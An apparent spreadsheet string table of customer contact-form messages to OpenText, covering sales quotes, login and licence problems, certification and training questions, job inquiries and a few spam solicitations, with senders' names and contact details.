    <t xml:space="preserve">I’m part of Tengizchevroil Cloud migration team. Our team working on migration of Tengizchevroil apps to the cloud (Ms Azure). We are using your software based on Captiva and Documentum solutions_x000D_
_x000D_
Could you please advise: _x000D_
1.	Do you have SaaS version of Documentum and Captiva applications? If yes, could you please provide pricing model for cloud application? _x000D_
2.	If not, do Documentum and Captiva applications support MS Azure PaaS as infrastructure and/or database layer? If yes, could you please share link to installation instructions and migration from on-premises guides? _x000D_
3.	Do your SaaS/PaaS versions of application support Azure AD as Application Authorization? _x000D_
4.	If not,  do Documentum and Captiva applications support MS Azure IaaS as infrastructure layer? _x000D_
5.   If not, when do you expect to support cloud infrastructure or provide cloud (SaaS or MS Azure PaaS) version of Documentum and Captiva applications?_x000D_
</t>
  </si>
  <si>
    <t>Vacancies</t>
  </si>
  <si>
    <t>Hi Team,_x000D_
Can you please share EnCE certification costing.</t>
  </si>
  <si>
    <t>Interested in Forensic Investigations Product - URGENT, must respond today</t>
  </si>
  <si>
    <t xml:space="preserve">I seek information or possible presentation on the implementation of Esafe.  I have a client who may is interested in similar solution </t>
  </si>
  <si>
    <t>I really need to get my profile fixed. My previous email was gary.tickle@rrd.com. The company split and now my new email is gary.tickle@lsccom.com. I have 2 instances of VistaPlus installed. Please help me get this fixed. I need to get into the knowledgebase.</t>
  </si>
  <si>
    <t>Hi, is RightFax supported on Windows 10.  If not, what is the replacement solution ?_x000D_
Regards,_x000D_
James</t>
  </si>
  <si>
    <t>Hi there, _x000D_
can you please advise if the Tableau write blockers are likely to move from USB 3to USB-C in the near future?_x000D_
_x000D_
Thanks</t>
  </si>
  <si>
    <t>I am not able to log into my fax2mail account which is now opentext. My fax number is 321-274-4146. Please contact me as soon as possible to solve this issue. Thank you.</t>
  </si>
  <si>
    <t>We are interested in looking into either a right fax server or cloud based fax receiving_x000D_
We receive about 1500 to 1800 different faxes a month across 2 different numbers</t>
  </si>
  <si>
    <t xml:space="preserve">Looking for EDI middleware of SAP ECC 6.0 EHP 7. </t>
  </si>
  <si>
    <t>Demo OpenText Content Suite Platform. _x000D_
I need a content solution for a project and would like to test it.</t>
  </si>
  <si>
    <t xml:space="preserve">I am trying to recover my password for my ID - sang.oh@fcagroup.com_x000D_
But I received error saying that failed to recover id/passwd.  If tried to create new one with same id, it says that id already exist._x000D_
Can you please help!_x000D_
</t>
  </si>
  <si>
    <t>j'ai besoin de convertir un document en pdf</t>
  </si>
  <si>
    <t xml:space="preserve">Cavalier Technical Services is a computer re-seller based in New York and a primary vendor to the United Nations.  They are asking us for a quote for  Encase Forensic SMS Single-Station workstation software 1 year license renewal, p/n: 310600010 to cover from Nov 14, 2018 to Nov 13, 2019.   Please provide our cost, purchasing options, and terms._x000D_
_x000D_
Regards,_x000D_
_x000D_
Mark Gallop_x000D_
Cavalier Technical Services_x000D_
224 West 35th Street _x000D_
New York, NY  10018_x000D_
Office: 212 682 1780_x000D_
Direct: 516 422 4927_x000D_
</t>
  </si>
  <si>
    <t>Hello Opentext, _x000D_
_x000D_
My name is Joyce Park and I’m a third year Honours Psychology student from the University of Waterloo. I was wondering if there are any co-op positions being offered from January 2019 to April 2019. I saw a posting for a User Experience Researcher position in Ottawa on Glassdoor and I believe I would thrive in a co-op position that also specializes in usability research and data analysis. _x000D_
_x000D_
I will be looking forward to your reply! _x000D_
_x000D_
Thank you, _x000D_
_x000D_
Joyce Park</t>
  </si>
  <si>
    <t>update client software</t>
  </si>
  <si>
    <t xml:space="preserve">Business need for OCR software please provide point of contact in order for me to set up a call\demo. </t>
  </si>
  <si>
    <t>Unable to login on Trusted Link on one computer and need to setup same computer to be able to transmit.</t>
  </si>
  <si>
    <t>Hello,_x000D_
I earned EMC Documentum certifications a while ago and would like to update my e-certificates and logos which are still in use by my company. I contacted DELL EMC and they referred me to you since Documentum was acquired by OpenText._x000D_
_x000D_
Could you help me get updated e-certificates and electronic verification links (which are used in tenders)?_x000D_
_x000D_
My original questions were:_x000D_
_x000D_
1) How do I get verification code (and link) for credential "EMC Content Management Foundations" and "Content Management Web Application Programming Specialist Version 6 (EMCApD)" which are no longer provided by certmetrics._x000D_
2) Do you provide Acclaim badges for these two certificates? Since my work email changed I didn't get any notifications. I use my personal email for Pearson VUE and Acclaim._x000D_
3) How do I download updated e-Certificates for my credentials? I could not find neither logo nor e-certificate downloads in certmetrics anymore._x000D_
4) Was my certification transferred to OpenText after Documentum was acquired by this company?_x000D_
_x000D_
My CertTracker ID: DELL259200_x000D_
_x000D_
Best regards,_x000D_
Karolis Šeškas</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,_x000D_
_x000D_
We need to reinstall the following eDiscovery SAFE and LM Licenses:_x000D_
X100008062474_x000D_
X100008062452_x000D_
_x000D_
Thank you,_x000D_
Mike_x000D_
</t>
  </si>
  <si>
    <t>Interest in specifically the Qfinity Observe product to replace our current Call Recording vendor. Need a call recording product that will integrate easily with CallMiner Eureka, records in Stereo, and has excellent technical support.</t>
  </si>
  <si>
    <t>CGI Object Importer Generator</t>
  </si>
  <si>
    <t>Hello, such good morning, I ask for help in a case of QSP, the software does not work and I have more than 7 months without help, you can support me</t>
  </si>
  <si>
    <t>I completed the course Captiva Fundamentals and Administration 7.6 3-8201 (579629), however i have not received a certificate._x000D_
_x000D_
Can you please send me a certificate._x000D_
_x000D_
Regards,_x000D_
Zaheer Shaik</t>
  </si>
  <si>
    <t xml:space="preserve">AS2 connection problem with external Trading Partner!! </t>
  </si>
  <si>
    <t>Need to understand better the digital asset management product suites.</t>
  </si>
  <si>
    <t xml:space="preserve">I am told you work with DMSi / Agility. I would like to be able to further customize our acknowledgements. </t>
  </si>
  <si>
    <t>Entering my passwort with OT Connect resulted in a "Web Server Error".May be the password is too complex, though I could enter it successfully by changing.</t>
  </si>
  <si>
    <t>We are currently using faxpress and would like to move to something IP based to eliminate our copper fax lines. Does fax2mail support TLS? Can we port our existing fax numbers somehow? I am assuming we can both send and recieve fax via email using something like 12345678@something.com?</t>
  </si>
  <si>
    <t xml:space="preserve">kindly help us with the ECCN number of the software_x000D_
_x000D_
ECCN – Export Control Classification Number_x000D_
If you do not have your software classified with an ECCN, please kindly answer the following questions so that we may self-assess:_x000D_
 _x000D_
 	NO	YES_x000D_
Does the Software perform any encryption or utilize any encryption processes?	 	_x000D_
If the answer is YES to the above, please indicate if the encryption is coded into the application or separately called (such as using SSL)	 	_x000D_
If the answer is YES to the above, please indicate what function(s) the cryptography/encryption serves		 _x000D_
A,  Copyright protection purposes (Includes using a license key/code)		 _x000D_
B, User authentication purposes	 	_x000D_
 C, A core part of the functionality such as to encrypt databases_x000D_
 _x000D_
D, To encrypt communications between the software and a host system		 _x000D_
 _x000D_
Background information_x000D_
An Export Control Classification Number (ECCN) is a specific alpha-numeric code that identifies the level of export control for items e.g. software that are exported from member states of the Wassenaar Arrangement, including the United States. After obtaining the ECCN, the exporter must determine whether an export license is required to export items to certain countries._x000D_
_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Three members of our agency are interested in attending two separate courses (DF-120 and DF-210).  Virtual classes are full - question is:  The other shown courses show "GSI- Washington, DC.) those are not full and want to make sure those classes are instructor led courses.  </t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
I got an email from opentext that Simon-Key answered to  my question "error-when-trying-to-run-ntfs-usnjrnl-parser-v5-0-2-enpack-file" and there is a button i can click on to take me to the answer._x000D_
_x000D_
However when i try this, i guides me to a completely different post._x000D_
Also, i see there is no answer posted to my question._x000D_
_x000D_
Is this email in error or is the link bad ?_x000D_
_x000D_
Marc</t>
  </si>
  <si>
    <t xml:space="preserve">Interested in redaction software.  </t>
  </si>
  <si>
    <t xml:space="preserve">Hi,_x000D_
        We have been Gupta Partner in Taiwan for 20 years. Can we sell OpenText Team Developer for Taiwan customer ? _x000D_
Can you give us contact person and price table for selling ? Please pass this mail to key person ! _x000D_
Best Regards,_x000D_
                        Robert Hwang _x000D_
=========================================================================== _x000D_
肯美資訊科技股份有限公司 (Ken System International Corp.)_x000D_
資訊產品部 副總  (Product Department Vice President)_x000D_
黃     宏     誌           (Robert Hwang)_x000D_
電話(TEL)     :   886-2-8752-3100  #216_x000D_
傳真(FAX)    :   886-2-8752-3105_x000D_
地址(ADDRESS)   : 11493 台北市內湖區內湖路1段300號7 F之1_x000D_
  (7F-1,300,SEC. 1,NEIHU RD., NEIHU  DISTRICT, TAIPEI  11493, TAIWAN,R.O.C.)_x000D_
郵箱(E-Mail) : robert.hwang@kensystem.com.tw_x000D_
===========================================================================_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,_x000D_
_x000D_
The reason for contact is that I would like to know for how much longer my EnCE and CFSR certifications are valid and know some details around renewal. I think as I did the CFSR a year after the EnCE this might have extended the latter for another year, but I cannot be sure, so would appreciate some advice from someone “in the know”._x000D_
_x000D_
Many thanks,_x000D_
Andrew _x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Installation NFS-Server v14 on Windows Server 2012 R2 doesn't work correctly: The settings seems to be identical as the Settings on the old 2008 Server, but the clients can't connect to the Server._x000D_
  </t>
  </si>
  <si>
    <t>We are implementing the Port Operation Software, which is TOPX Expert, in order for it to operate, we need to purchase 20 accounts of Exceed software. Therefore, could you pleáe provide us specific instruction of which type is compatible, with quotation and payment method.</t>
  </si>
  <si>
    <t>We are looking to implement a DMS solution [multi-tenant] as fully managed service integrated with our core insurance platform. Would like to know the cost, components, services, partners, etc. information for on premise and on cloud deployments. Looking to implement the solution within 6 months.</t>
  </si>
  <si>
    <t>We used to have a subscription with Hightail. It's been inactive for ages but we've just had a charge on our AMEX card. Can't even log into it and your site doesn't recognise the login address. I'd ike a refund please.</t>
  </si>
  <si>
    <t>query for rightfax cloud</t>
  </si>
  <si>
    <t xml:space="preserve">Dear sir,_x000D_
Good day!_x000D_
_x000D_
Please quote us the best price for the following product and let us have some reseller discount._x000D_
Customer is National Science &amp; Technology Center for Disaster Reduction._x000D_
The product is _x000D_
OpenText Exceed without support *1_x000D_
OpenText Exceed for 1 year support *1_x000D_
OpenText Secure Shell (add-on) without support *1_x000D_
_x000D_
Thank you, waiting for your reply!_x000D_
_x000D_
Kind Regards,_x000D_
Jack Tseng | 曾友頡_x000D_
_x000D_
 _x000D_
Phone : 886-2-22212155 ext.159 | Fax : 886-2-22219008 _x000D_
 | E-mail: jack@linksoft.com.tw _x000D_
6F-10., No.351, Sec. 2, Zhongshan Rd., Zhonghe Dist., New Taipei City 23504, Taiwan_x000D_
</t>
  </si>
  <si>
    <t>buenas tardes, necesito saber su representante el Mexico me interesa una licencia de softeare Hummingbird exceed estamos en monterrey nuevo leon mexico</t>
  </si>
  <si>
    <t>Hi!_x000D_
I spoke to a sales rep. by the name of Brandon 2 weeks ago and haven't received any information in regards my request yet; which was:_x000D_
_x000D_
I need information on pricing for a DMS software, this will be for the document management of an insurance company located in Madrid, Spain, the management will be performed by my company located in Mexico City. I just would like to know the pricing for 2 licenses and the purchase of the DMS software tool._x000D_
_x000D_
Thanks in advance!_x000D_
_x000D_
Regards,_x000D_
_x000D_
Fernande Velasquez</t>
  </si>
  <si>
    <t>Requiring Price quote for 16.4 version of the RightFax Software</t>
  </si>
  <si>
    <t xml:space="preserve">I'm a current OpenText customer and would like to purchase an NRF listing.  Please have someone contact me so that I can purchase the NRF Color Code listing.  </t>
  </si>
  <si>
    <t>Hello, _x000D_
I'm Nicolas Baudon, I tried to apply on your website to a job offer (Software Engineer in Oldenburg) but I failed to log in. Is there an other way to do it ? _x000D_
Best Regards, _x000D_
Nicolas Baudon _x000D_
baudon.nico@gmail.com</t>
  </si>
  <si>
    <t>Wanted to find what is the maximum length of UIM field of type STRING. Also what is the maximum length of IAValue field.</t>
  </si>
  <si>
    <t>Service Request # 1-3442378911 - We have transactions stuck in Pending Operations and nothing we doo seams to clear them.</t>
  </si>
  <si>
    <t>Hello thanks for all !</t>
  </si>
  <si>
    <t xml:space="preserve">Goodafternoon,_x000D_
_x000D_
We currently using an older version of applicationextender, and looking to upgrade everything to the current version._x000D_
Is there a regional distributor for Aruba/Caribbean, or are sales and support done at a different manner?_x000D_
_x000D_
I like to receive more information._x000D_
_x000D_
Kind regards,_x000D_
_x000D_
Bart_x000D_
</t>
  </si>
  <si>
    <t>Interested in more information on Documentum Capital Projects, can I arrange a trial or demo as well as get a proposal or quote for this Friday? This is my second request.</t>
  </si>
  <si>
    <t>We will need to cancel our subscription at the end of the next billing cycle.  How do I go about doing that?  Do I have to provide some kind of notice?  I do not want to cancel it yet, but will be soon.  I am referring to my opentext my portal, formally fax2mail._x000D_
_x000D_
Thanks,_x000D_
Kris</t>
  </si>
  <si>
    <t xml:space="preserve">Greetings,_x000D_
_x000D_
My name is jerry Hanratty with Valley Relocation. I wanted to send you a brief introduction of our company history, and what services we can provide, shall the need arise._x000D_
_x000D_
Valley Relocation, a California-based business established in 1985, is one of the largest and most respected movers on the West Coast. We offer complete relocation solutions for your commercial needs, including:_x000D_
_x000D_
*Office Moving_x000D_
*Installations_x000D_
*Disconnect/Reconnect Electronics including servers_x000D_
*Storage_x000D_
*Logistics_x000D_
*E-waste Solutions_x000D_
_x000D_
Valley Relocation provides our clients with the most up to date technology that would allow your company to eliminate multiple vendors, control cost and effectively manage the relocation process._x000D_
_x000D_
Some of our most notable clients include; Cisco Systems, Hewlett Packard, Hitachi Data Systems, Dell, and many other organizations._x000D_
_x000D_
Please contact me for a free estimate or visit our website for more information._x000D_
_x000D_
_x000D_
Kind regards,_x000D_
</t>
  </si>
  <si>
    <t>We are Windows 10 and SCCM 2017 (Vnext) and we created a package which works fine but when put into a task sequence, it always fails with return code -1 and the logs do not show much as to a reason.  can you please confirm if there is something special we need to perform to make this work in a task sequence?</t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
I'm with Better Direct, a certified HUBZone &amp; SDVOSB reseller. We've sold your products before through our distribution partner, IngramMicro; however, they no longer sell your products. Could you by chance provide me a contact/distribution for future Federal opportunities? _x000D_
_x000D_
Thank you,</t>
  </si>
  <si>
    <t xml:space="preserve">I'm having an issue with Decisiv. I would like to create a ticket but the website that I have and the credentials that I'm using no longer works. Could someone please contact me today to help me with whatever the new website is so I can create new credentials?_x000D_
Thanks,_x000D_
Jake Mickens </t>
  </si>
  <si>
    <t xml:space="preserve">Good morning,_x000D_
_x000D_
I would like to request a three individuals to attend the Endpoint Investigator Training. In addition, please send a copy of a proprietary letter and a training schedule for upcoming classes in California. The proprietary letter must be dated that same as the quote sheet. If you have questions please don't hesitate to call. _x000D_
_x000D_
Regards,_x000D_
_x000D_
Lorne Landry_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Need a quote for Fax2Mail cloud fax service, Estimated page volume: 12,000 per month</t>
  </si>
  <si>
    <t>We are looking to start a build out of EDI in our supply chain and tech stack.  We were given your name as a reference by Nordstrom as someone that can help us bring this online in a short period of time.  Is this a service you offer?</t>
  </si>
  <si>
    <t>I need a support login.  I work for CSU, your contact is Josh Clark.   We have Vista Plus Business Edition PROD:  1000038162 and Vista Plus Business Edition Non-Production Maintenance: 1000038160.   End User Number:  10316412.   _x000D_
Any questions please contact Josh @ josh.clark@colostate.edu   phone: 970-491-7169</t>
  </si>
  <si>
    <t xml:space="preserve">Need a budgetary quote for a USAF Customer - OpenText Exceed 15 - 40 users </t>
  </si>
  <si>
    <t xml:space="preserve">Good afternoon, _x000D_
_x000D_
A cup of fresh coffee is something many of us love to enjoy. But have you considered how it can speak volumes for your company too? It can make employees and customers feel valued and enhance their work satisfaction. In fact, 75% of employees believe that having high-quality coffee in the workplace suggests their employer cares about their wellbeing._x000D_
_x000D_
If you’re looking to provide your customers and staff to quality coffee in meeting rooms, or provide something extra in communal areas, Nespresso Professional have a range of stylish and low-maintenance machines designed to meet your needs and budget._x000D_
_x000D_
If you are interested in meeting to discuss these machines, please don’t hesitate to contact me on 07901 788 687 – alternatively, you can contact me via email also at Daniel.Harkin@nespresso.com _x000D_
_x000D_
Hopefully we can speak again soon._x000D_
_x000D_
Best wishes,_x000D_
_x000D_
Danny Harkin_x000D_
</t>
  </si>
  <si>
    <t>Hi,_x000D_
 _x000D_
We are B2B database provider. Would you be interested in discussing about the database from Health IT professionals industry._x000D_
 _x000D_
We have the complete contact details and verified email addresses of key decision makers such as CIO's, CTO's, CNO's, CNIO's, CMO's, CMIO's, Clinical Engineering Professionals, Clinical Informatics, Healthcare Financial Professionals, IT Professionals, Doctors, Nurses, Pharmacy Professional, Physician, Public Health Practitioner, Public Health Practitioner, Dentist (All Specialty) and Medical Consultants._x000D_
 _x000D_
Sectors: Hospitals, Drug Stores, Pharmaceutical, Manufacturers, Otolaryngologists, Medical Devices &amp; Equipment's, Clinical Trial &amp; Clinical Research, Retail &amp; Distribution and many more._x000D_
 _x000D_
Kindly let me know your target criteria so that we can provide you exact counts, cost and few free samples._x000D_
 _x000D_
Target Industry :_x000D_
Target Geography :_x000D_
Target Job Title :_x000D_
 _x000D_
Best Regards,_x000D_
Alice Miller</t>
  </si>
  <si>
    <t>we are a current customer and we need an updated Certificate of Insurance yo keep you active in our payment system._x000D_
_x000D_
Thanks,</t>
  </si>
  <si>
    <t>I am a BA with HRC at Fort Knox and have been asked to add Documentum D2 and D2Plus to our Approved Products List.  I need to know the most current version and the support lifecycle of both products if available._x000D_
_x000D_
Thanks.</t>
  </si>
  <si>
    <t xml:space="preserve">We have four Encase licenses and I need to very the service agreements and when they expire.  I also need a sales contact as I am now overseeing the forensic side as part of my role.  </t>
  </si>
  <si>
    <t xml:space="preserve">Looking for general information on faxing services to see if this system will work with our setup. </t>
  </si>
  <si>
    <t>We have a client that has a need for OpenText and we would like to discuss this opportunity with someone, this week please. Thank you.</t>
  </si>
  <si>
    <t>We have a Teleform v9 system that was purchased many years ago and has been off maintenance for a while.  We are looking at costing options for upgrading / changing this system to something compatible with Windows 7._x000D_
_x000D_
Would you be able to provide a cost for upgrading _x000D_
1 x readre_x000D_
3 x verifier_x000D_
2 x designer _x000D_
3 x scan station _x000D_
licenses from version 9 to current?_x000D_
_x000D_
Regards_x000D_
Samantha</t>
  </si>
  <si>
    <t>I am not able to go Support page.</t>
  </si>
  <si>
    <t xml:space="preserve">Hello, _x000D_
_x000D_
I have confirmed my email but not able to access support or EnCase downloads. This is the message I see: Our records indicate that you have registered for access to My Support but have not yet confirmed your email with us._x000D_
_x000D_
I would like to download EnCase updates as well as submit support tickets. </t>
  </si>
  <si>
    <t xml:space="preserve">dongle licence renewal here  a list of my dongles, before the merge my contact was Stella Frazier_x000D_
V142591886U_x000D_
V896971506U_x000D_
V1892903518U_x000D_
V1788095057_x000D_
V906131654_x000D_
V230969731U_x000D_
G2002061298_x000D_
V984549127U_x000D_
V462986639_x000D_
V1879554139U_x000D_
V1490150988U_x000D_
G2002061300 _x000D_
</t>
  </si>
  <si>
    <t>Is there anyway to find out what are the courses I have attended previously granted I that I have changed my company and I noticed that the certificates provided did not include the course codes?</t>
  </si>
  <si>
    <t xml:space="preserve">Gerne möchten wir mehr über Ihre Lösung"Vendor Invoice Management for SAP Solutions (VIM)" erfahren. Als VAR der SAP suchen wir nach einer kostengünstigen, KMU tauglichen "Kreditoren-Rechnungseingangs-Lösung". Entsprechend betrachten wir natürlich auch die SAP Lösungen._x000D_
Die Idee ist, dass wir unseren KMU-Kunden entsprechend eine Lösung anbieten wollen. Oft stellt sich die Frage ab welchem Kreditoren-Rechnungsvolumen welche Lösung eingesetzt werden könnte. Wir sprechen hier vom Schweizer KMU-Markt. _x000D_
Könnten Sie uns entsprechende Informationen zukommen lassen?_x000D_
Bei Rückfragen stehe ich Ihnen natürlich gerne zur Verfügung_x000D_
Freundliche Grüsse_x000D_
Rolf Burkhalter_x000D_
Leiter SAP Beratung_x000D_
</t>
  </si>
  <si>
    <t>I am not getting an email when trying to reset my password.</t>
  </si>
  <si>
    <t>I need my licensekeys</t>
  </si>
  <si>
    <t>RightFax Appliance Server Analog 8 port</t>
  </si>
  <si>
    <t>Dear Sirs and Madams, I have just registered for an account. However, the login failed "access denied". Could you please check. Thanks, Arno</t>
  </si>
  <si>
    <t>I want to set up a repository for our past exam papers</t>
  </si>
  <si>
    <t>Air Products is looking for a new Lab notebooks system and I would like to see what you have to offer.</t>
  </si>
  <si>
    <t xml:space="preserve">I am a college student currently taking up BS degree in Computer Science at De La Salle University. I am required to undergo an On the Job Training (OJT) for a minimum of 320 hours during the time frame of January 03 to April 19. This is in partial fulfillment of the requirements of the course._x000D_
_x000D_
I am seeking an internship position that is related to my program with the intention of gaining work experience as well as fulfilling the requirements for a on-the-job training. Should I be given the opportunity, I intend to use my knowledge and skills to aid the company in its objectives.  </t>
  </si>
  <si>
    <t>There is an update to Adobe Acrobat (Version 19.008.20074) that is not compatible with the latest version of your IRM Client for PDF. Is there an update coming soon to fix this? I am having to uninstall the Adobe update and install an old version of Acrobat with all of my users that use your product._x000D_
Please advise._x000D_
-Andrew</t>
  </si>
  <si>
    <t xml:space="preserve">I would like to find out who our account rep. is.  Nikon is looking for a resource to manage the CMS.  </t>
  </si>
  <si>
    <t xml:space="preserve">Sehr geehrte Damen und Herren,_x000D_
_x000D_
wir sind ein Maschinenbauunternehmen aus dem Großraum Stuttgart. Einer unserer Kunden, ein großer Automobilhersteller, würde gerne seine Bestellungen für Ersatzteile elektronisch an uns übertragen. Zudem sollen Self Billing Rechnungen an uns übertragen werden. Die Anbindung kann per OFTPv2 oder AS2 erfolgen. Als ersten Schritt würden wir gerne die erhaltenen Dateien in ein menschenlesbares Format (pdf) umwandeln._x000D_
_x000D_
Wir haben selber zwei SAP ECC 6.0 Systeme inklusive Business Connector im Einsatz. Ein Empfang der Bestellungen und Rechnungen per Idoc könnte in einem zweiten Schritt erfolgen._x000D_
_x000D_
Mit mehreren Lieferanten haben wir bereits EDI Verbindungen über den Business Connector aufgebaut. Hierüber werden Bestellungen versendet und Auftragsbestätigungen empfangen. Um die Anbindung neuer Lieferanten zu vereinfachen, würden wir gerne eine Cloudlösung zwischenschalten._x000D_
_x000D_
Es würde mich sehr freuen wenn Sie sich bezüglich dieser Anforderungen bei mir melden würden, gerne auch telefonisch._x000D_
_x000D_
Mit freundlichen Grüßen_x000D_
Heiko Rauner_x000D_
</t>
  </si>
  <si>
    <t>Re: Error in your Website_x000D_
_x000D_
Hi,_x000D_
_x000D_
We are a leading Digital marketing company/SEO Company._x000D_
_x000D_
I was analyzing your site and it seems that some of your website rankings have dropped. It is due to non-optimized techniques/errors and Google guidelines not being followed properly. As you know that Google’s crawler is software and work on the coding basis only._x000D_
_x000D_
That’s why the site coding portion should be strong for better results._x000D_
_x000D_
I would like to present a detailed analysis of your website along with errors that your website and ways to improve your Google rankings._x000D_
_x000D_
It would be a detailed report and would be explained as well on Skype once we send this over to you._x000D_
_x000D_
Note: Kindly let me know your phone number and best timing along with time zone to give you a call to discuss more._x000D_
_x000D_
Thanks_x000D_
Steve Smith_x000D_
steveseocarner@gmail.com</t>
  </si>
  <si>
    <t>Necesito el link de la version 7 de encase</t>
  </si>
  <si>
    <t>РАССЫЛКА ПО ФОРМАМ ОБРАТНОЙ СВЯЗИ В 1 200 000 ФОРМ РОССИИ И СНГ - 3000 РУБЛЕЙ _x000D_
РАССЫЛКА ПО ФОРМАМ ОБРАТНОЙ СВЯЗИ ЛЮБОЙ СТРАНЫ - 3000 РУБЛЕЙ ЗА 1 МЛН _x000D_
 _x000D_
Это рассылка по формам с сайтов , которые заполняются нашей программой. _x000D_
письмо с вашим коммерческим предложением приходит на контактный E-mail организации. _x000D_
При рассылках через форму ОБРАТНОЙ связи  каждый сайт отправляет сообщение «сам себе» и поэтому все письма приходят во входящие! _x000D_
 _x000D_
 _x000D_
-Гарантии,контроль рассылки и отчёт! _x000D_
 _x000D_
 _x000D_
Не отвечайте на это сообщение со своего ящика электронной почты, так как оно создано автоматически! _x000D_
Используйте для связи: _x000D_
sviazs@bk.ru                                       Telegram: @form2018                            Skype: 2018form</t>
  </si>
  <si>
    <t xml:space="preserve">Not able to log-in to knowledge base and support portal. I recently updated the account details with latest communication details. Not sure if is causing the issue. I go this account from my predecessor employee with email ID - amit.rastogi@infosys.com. Now i am succeeding his role and need this account. please help. </t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
Could you confirm that your VAN are working with } separator ?_x000D_
_x000D_
Thank you._x000D_
_x000D_
Regards,_x000D_
_x000D_
Quentin Benedetto</t>
  </si>
  <si>
    <t xml:space="preserve">looking at the advert I am more than experienced to take up the challenge meet the clients expectations </t>
  </si>
  <si>
    <t>Purchasing and installing opentext</t>
  </si>
  <si>
    <t>Dear Sir,_x000D_
I can't login as a member. Please do a kind help. Thank you!</t>
  </si>
  <si>
    <t>Hi,_x000D_
I am having trouble registering for the 'My Support' resource on your website. I click the link to 'Request confirmation email', then when I receive that email, I follow through the process. I get the message that states 'Account verified successfully', and explains that I will receive an email notification from an OpenText representative. Then when I log in, I still can't access the resource, I just get the original message asking me to start the whole registration process again. It is stuck in that loop. It appears that the missing part is that I haven't heard from an OpenText rep. _x000D_
I first tried this registration a few weeks ago, then again this week. _x000D_
Please help._x000D_
_x000D_
Many thanks _x000D_
_x000D_
James</t>
  </si>
  <si>
    <t xml:space="preserve">Dear Team,_x000D_
 _x000D_
on behalf on RWE I am investigating with regards to the compatibility of deployed/provided software with Windows 10. _x000D_
 _x000D_
We are using the software  Windows 10 Migration Open Text Content Server Office Editor.  which is developed by you. Unfortunately I can’t find any information about following questions._x000D_
 _x000D_
license model, upgrade with existing license, windows 10 compatible?_x000D_
</t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
My name is Konstantin Golotsvan and I working for the Docler Holding Luxembourg. We are currently searching for the document management software for our group (~50 companies) and your software after the first round of pre-screening seems to be matching our criteria. We would like to get in touch with you and share our requirements and receive some answers to our questions. _x000D_
_x000D_
Waiting for your call_x000D_
_x000D_
Thanks!</t>
  </si>
  <si>
    <t>Hi Opentext_x000D_
_x000D_
I'm contacting yuu because I have some issues with our EnCase dongles in Denmark._x000D_
We have 2 dongles, can provide serialnumbers if you need them, but I can't figure out how to get access to download different versions of EnCase._x000D_
And one of our dongles keep showing "No V7 Cert" in EnCase - would like to get some help with that aswell._x000D_
_x000D_
Can you send me in the right direction?_x000D_
_x000D_
Best, Jonas</t>
  </si>
  <si>
    <t>Need price (partner's / vendors price) for Hummingbird Exceed Server Edition from Opentext</t>
  </si>
  <si>
    <t xml:space="preserve">Hello,_x000D_
My Name is Andrew from Jakarta, Indonesia._x000D_
We are the distributor for Kyocera Document Solutions in Indonesia._x000D_
_x000D_
We have a customer who is currently looking for fax solution for Fax over IP pabx and sip trunk._x000D_
Can i get the contact person to know more about open text right fax solution pricing?_x000D_
_x000D_
Thank you_x000D_
_x000D_
Andrew_x000D_
</t>
  </si>
  <si>
    <t>Unable to confirm registration</t>
  </si>
  <si>
    <t>Good day!_x000D_
To evaluate the functionality of the InfoFusion Integration Center software, kindly ask to send a trial key and an installation file._x000D_
Thank!_x000D_
_x000D_
Best regards,_x000D_
Artem Artamonov_x000D_
ITAM Specialist</t>
  </si>
  <si>
    <t>Dear sir or madam,_x000D_
_x000D_
I am interested in the Documentum training courses and would like to know when the payment deadline for the respective training courses is. Are there any additional discounts for Capgemini as a partner?_x000D_
_x000D_
I am looking forward to an answer!_x000D_
_x000D_
Best regards_x000D_
_x000D_
Pierre Sondermann</t>
  </si>
  <si>
    <t>Unable to login  - Say Access Denied! Kindly help.</t>
  </si>
  <si>
    <t>hi team_x000D_
_x000D_
Need your help to test the content management server and its allied products like webtop. I am consultant and want to show this to our client.</t>
  </si>
  <si>
    <t>I want to use your cloud fax service for the company I work for. We need a tool that can handle thousand of fax on monthly basis</t>
  </si>
  <si>
    <t>Hola</t>
  </si>
  <si>
    <t>Request call/ intro meeting to learn more about OpenText Learn Flex as soon as possible. Thank you.</t>
  </si>
  <si>
    <t xml:space="preserve">can't log in. already reset password but can't still log in. </t>
  </si>
  <si>
    <t>Will there be an update to the IRM client for PDF to work with the 2019 (v19.x) release of Adobe Reader DC that just came out this month?  The current version is incompatible and is causing issues for state agencies who use this client.  Since Adobe Reader DC is on a continuous update track, it's going to be really hard to keep an old version rolled back.  Please advise.  Thanks.</t>
  </si>
  <si>
    <t>I can no longer view my tickets. When I log into mysupport, it cycles, can somebody help</t>
  </si>
  <si>
    <t>We need to hire a service to deliver fax. We are a Money Services Business that requires thousands of faxes on monthly basis</t>
  </si>
  <si>
    <t xml:space="preserve">looking for stand-alone conflict checking software. Please email me your pricing. </t>
  </si>
  <si>
    <t>Problem to confirm email with the account sergio.zuniga@leoni.com, please check why not is possible confirm the user, the user was confirmer but no is possible into to Manage My account</t>
  </si>
  <si>
    <t>I am having a pop-up say that I have reached my disk quota. I am not able to send emails. What does this mean? What is a solution?</t>
  </si>
  <si>
    <t>I received a Registration Confirmation email and responded.  OpenText Connect has my profile, and when I click on Blogs it works, but when I click on My Support I get _x000D_
"Access Denied_x000D_
We're sorry but you don't have permission to view this page."_x000D_
Please help._x000D_
Thank you._x000D_
- Ira</t>
  </si>
  <si>
    <t>We need some information about the product and its integration with brava batch application for merging documents</t>
  </si>
  <si>
    <t>Please advise how to set up a OpenText Catalogue ID</t>
  </si>
  <si>
    <t>DMS price quote and demo for a project for about 75 users.</t>
  </si>
  <si>
    <t>Looking to see if you offer a Report building course specific to creating and modifying EnCase reports.  Looking to learn to change font, colors, format, etc. to make our reports easier to read and follow.</t>
  </si>
  <si>
    <t xml:space="preserve">My predecessor bought Brava in about 2010. The company would like to skip the intervening upgrades and purchase the CXL 10 pack at $1305.00. Our Accounts Payable dept would prefer that we be invoiced. </t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
